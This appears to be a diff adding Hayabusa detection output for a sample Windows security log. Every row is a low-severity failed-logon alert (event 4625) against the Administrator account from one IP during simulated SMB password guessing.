+2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
